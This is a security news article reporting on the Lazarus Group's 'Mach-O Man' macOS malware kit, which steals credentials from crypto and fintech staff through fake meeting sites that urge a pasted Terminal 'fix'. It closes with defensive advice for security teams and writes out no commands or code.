North Korea–linked hacking outfit Lazarus Group is pushing a new native macOS malware kit security researchers call “Mach-O Man.” Lazarus built the toolkit with several Go‑based Mach-O binaries and designed it to run smoothly on modern Apple Silicon machines used by developers and executives. Researchers say the campaign focuses on high‑value corporate environments in fintech, crypto, and other finance‑adjacent sectors.
The kit is the center of an ongoing intrusion effort that seeks to obtain deep access to business systems and steal credentials, according to a technical article published by the Quetzal Team.
It collects browser sessions, tokens used to open internal tools or cloud dashboards, and passwords stored in the macOS Keychain. As a result, an attacker can gain access to trading desks through a compromised Mac.
Social Engineering Starts with “Urgent” Meeting Invites
The Mach-O Man playbook begins with social engineering instead of obvious phishing emails. Attackers send targets “urgent” invitations via apps like Telegram to a Zoom, Google Meet, or Teams call, then direct them to a fake meeting‑related website. There, the site claims there is a connection problem and tells the victim to paste a one‑line command into the macOS Terminal to “fix” it.
By running that command directly, users successfully install the malware and allow it to circumvent several company security safeguards.
The kit then downloads more payloads, creates persistence, and begins silently stealing data from the device. Analysts warn that this technique may evade detection by traditional endpoint security tools, as it uses native binaries and user-initiated actions rather than traditional exploit chains.
Why Crypto and Fintech Should Pay Attention
Lazarus has a long track record of targeting cryptocurrency businesses, including past AppleJeus campaigns that abused fake trading apps to compromise exchanges.
Analysts believe the group stole hundreds of millions of dollars in digital assets in earlier years through a mix of exchange hacks and supply‑chain attacks. The new Mach-O Man toolkit shows the group is still investing in macOS malware as more executives and engineers use Macs for work.
Researchers say organizations with hot‑wallet access, signing keys, or large balances face the highest risk, since stolen credentials or browser sessions could let attackers move funds, change withdrawal settings, or pivot into back‑office infrastructure without touching on-chain defenses.
Security teams in crypto, trading, and payments should lock down macOS endpoints, restrict Terminal use, and monitor for suspicious Go‑based Mach-O binaries.
READ MORE: BitMine Stock is On the Cusp of a Surge as Tom Lee Nears the 5% Mark
